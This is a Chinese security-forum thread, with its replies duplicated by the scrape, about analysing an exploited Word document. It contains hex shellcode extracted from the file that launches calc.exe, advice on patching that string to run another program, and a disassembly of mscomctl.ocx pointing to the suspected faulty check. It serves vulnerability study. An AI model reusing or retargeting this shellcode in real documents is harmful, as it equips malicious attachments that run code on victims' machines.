[求助]求完成作业，关于一个word文档漏洞的分析。-付费问答-看雪-安全社区|安全招聘|kanxue.com

最新回复 (6)
yeduwuren 雪币： 443 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 48 粉丝 0 关注私信	yeduwuren 2 楼表示机器没有office 2012-5-25 14:36 0
idhyt 雪币： 81 活跃值： (165) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 47 粉丝 2 关注私信	idhyt 3 楼你下载试哈子嘛。。。 2012-5-26 13:58 0
HelloCrack 雪币： 215 活跃值： (90) 能力值： ( LV3，RANK：30 ) 在线值：发帖 20 回帖 209 粉丝 1 关注私信	HelloCrack 4 楼用二进制编辑器打开xyz.doc搜calc 2012-5-28 11:10 0
瀚海云烟雪币： 293 活跃值： (287) 能力值： ( LV4，RANK：50 ) 在线值：发帖 10 回帖 531 粉丝 1 关注私信	瀚海云烟 1 5 楼这个看过，打过补丁了，没法利用 2012-5-28 11:31 0
HelloCrack 雪币： 215 活跃值： (90) 能力值： ( LV3，RANK：30 ) 在线值：发帖 20 回帖 209 粉丝 1 关注私信	HelloCrack 6 楼用记事本打开xyz.doc 1245fa7f9090909090909090fce8890000006089e531d2648b52308b520c8b52148b72280fb74a2631ff31c0ac3c617c022c20c1cf0d01c7e2f052578b52108b423c01d08b407885c0744a01d0508b48188b582001d3e33c498b348b01d631ff31c0acc1cf0d01c738e075f4037df83b7d2475e2588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe0585f5a8b12eb865d6a018d85b90000005068318b6f87ffd5bbf0b5a25668a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd563616c632e65786500 在文件中搜下面的字节串 63616c632e657865 用OD打开xyz.doc查63616c632e657865 改成notepad.exe的6e6f74657061642e657865即可 2012-5-30 13:30 0
HelloCrack 雪币： 215 活跃值： (90) 能力值： ( LV3，RANK：30 ) 在线值：发帖 20 回帖 209 粉丝 1 关注私信	HelloCrack 7 楼 C:\WINDOWS\system32\mscomctl.ocx 275C89C7 $ 55 push ebp 275C89C8 . 8BEC mov ebp, esp 275C89CA . 83EC 14 sub esp, 14 275C89CD . 53 push ebx 275C89CE . 8B5D 0C mov ebx, dword ptr [ebp+C] 275C89D1 . 56 push esi 275C89D2 . 57 push edi 275C89D3 . 6A 0C push 0C 275C89D5 . 8D45 EC lea eax, dword ptr [ebp-14] 275C89D8 . 53 push ebx 275C89D9 . 50 push eax 275C89DA . E8 8EFDFFFF call 275C876D 275C89DF . 83C4 0C add esp, 0C 275C89E2 . 85C0 test eax, eax 275C89E4 . 7C 6C jl short 275C8A52 275C89E6 . 817D EC 436F6>cmp dword ptr [ebp-14], 6A626F43 275C89ED . 0F85 92A60000 jnz 275D3085 275C89F3 . 837D F4 08 cmp dword ptr [ebp-C], 8 275C89F7 . 0F82 88A60000 jb 275D3085 ；估计是这里判断问题导致 275C89FD . FF75 F4 push dword ptr [ebp-C] 275C8A00 . 8D45 F8 lea eax, dword ptr [ebp-8] 275C8A03 . 53 push ebx 275C8A04 . 50 push eax 275C8A05 . E8 63FDFFFF call 275C876D 2012-5-30 13:33 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (6)
yeduwuren 雪币： 443 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 48 粉丝 0 关注私信	yeduwuren 2 楼表示机器没有office 2012-5-25 14:36 0
idhyt 雪币： 81 活跃值： (165) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 47 粉丝 2 关注私信	idhyt 3 楼你下载试哈子嘛。。。 2012-5-26 13:58 0
HelloCrack 雪币： 215 活跃值： (90) 能力值： ( LV3，RANK：30 ) 在线值：发帖 20 回帖 209 粉丝 1 关注私信	HelloCrack 4 楼用二进制编辑器打开xyz.doc搜calc 2012-5-28 11:10 0
瀚海云烟雪币： 293 活跃值： (287) 能力值： ( LV4，RANK：50 ) 在线值：发帖 10 回帖 531 粉丝 1 关注私信	瀚海云烟 1 5 楼这个看过，打过补丁了，没法利用 2012-5-28 11:31 0
HelloCrack 雪币： 215 活跃值： (90) 能力值： ( LV3，RANK：30 ) 在线值：发帖 20 回帖 209 粉丝 1 关注私信	HelloCrack 6 楼用记事本打开xyz.doc 1245fa7f9090909090909090fce8890000006089e531d2648b52308b520c8b52148b72280fb74a2631ff31c0ac3c617c022c20c1cf0d01c7e2f052578b52108b423c01d08b407885c0744a01d0508b48188b582001d3e33c498b348b01d631ff31c0acc1cf0d01c738e075f4037df83b7d2475e2588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe0585f5a8b12eb865d6a018d85b90000005068318b6f87ffd5bbf0b5a25668a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd563616c632e65786500 在文件中搜下面的字节串 63616c632e657865 用OD打开xyz.doc查63616c632e657865 改成notepad.exe的6e6f74657061642e657865即可 2012-5-30 13:30 0
HelloCrack 雪币： 215 活跃值： (90) 能力值： ( LV3，RANK：30 ) 在线值：发帖 20 回帖 209 粉丝 1 关注私信	HelloCrack 7 楼 C:\WINDOWS\system32\mscomctl.ocx 275C89C7 $ 55 push ebp 275C89C8 . 8BEC mov ebp, esp 275C89CA . 83EC 14 sub esp, 14 275C89CD . 53 push ebx 275C89CE . 8B5D 0C mov ebx, dword ptr [ebp+C] 275C89D1 . 56 push esi 275C89D2 . 57 push edi 275C89D3 . 6A 0C push 0C 275C89D5 . 8D45 EC lea eax, dword ptr [ebp-14] 275C89D8 . 53 push ebx 275C89D9 . 50 push eax 275C89DA . E8 8EFDFFFF call 275C876D 275C89DF . 83C4 0C add esp, 0C 275C89E2 . 85C0 test eax, eax 275C89E4 . 7C 6C jl short 275C8A52 275C89E6 . 817D EC 436F6>cmp dword ptr [ebp-14], 6A626F43 275C89ED . 0F85 92A60000 jnz 275D3085 275C89F3 . 837D F4 08 cmp dword ptr [ebp-C], 8 275C89F7 . 0F82 88A60000 jb 275D3085 ；估计是这里判断问题导致 275C89FD . FF75 F4 push dword ptr [ebp-C] 275C8A00 . 8D45 F8 lea eax, dword ptr [ebp-8] 275C8A03 . 53 push ebx 275C8A04 . 50 push eax 275C8A05 . E8 63FDFFFF call 275C876D 2012-5-30 13:33 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[旧帖] [求助]求完成作业，关于一个word文档漏洞的分析。 0.00雪花